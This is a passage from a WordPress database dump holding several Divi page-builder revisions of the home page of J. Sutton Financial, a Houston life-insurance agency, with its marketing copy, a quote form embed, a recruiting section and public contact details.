_module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 20:47:58','2023-04-08 20:47:58','',138,'http://cmdev-site1.com/?p=847',0,'revision','',0),(848,1,'2023-04-08 20:51:38','2023-04-08 20:51:38','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" logo_width_last_edited=\"on|phone\" logo_width_phone=\"75%\" sticky_enabled=\"0\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_text_color=\"#FFFFFF\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo_width_tablet=\"20%\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-72px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 20:51:38','2023-04-08 20:51:38','',138,'http://cmdev-site1.com/?p=848',0,'revision','',0),(849,1,'2023-04-08 20:51:51','2023-04-08 20:51:51','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" logo_width_last_edited=\"on|phone\" logo_width_phone=\"75%\" sticky_enabled=\"0\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_text_color=\"#FFFFFF\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo_width_tablet=\"20%\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-72px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" custom_padding=\"62px|||||\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 20:51:51','2023-04-08 20:51:51','',138,'http://cmdev-site1.com/?p=849',0,'revision','',0),(850,1,'2023-04-08 20:54:42','2023-04-08 20:54:42','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" logo_width_last_edited=\"on|phone\" logo_width_phone=\"75%\" sticky_enabled=\"0\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_text_color=\"#FFFFFF\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" custom_margin_last_edited=\"on|phone\" logo_width_tablet=\"20%\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-43px|||0px|false|false\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" 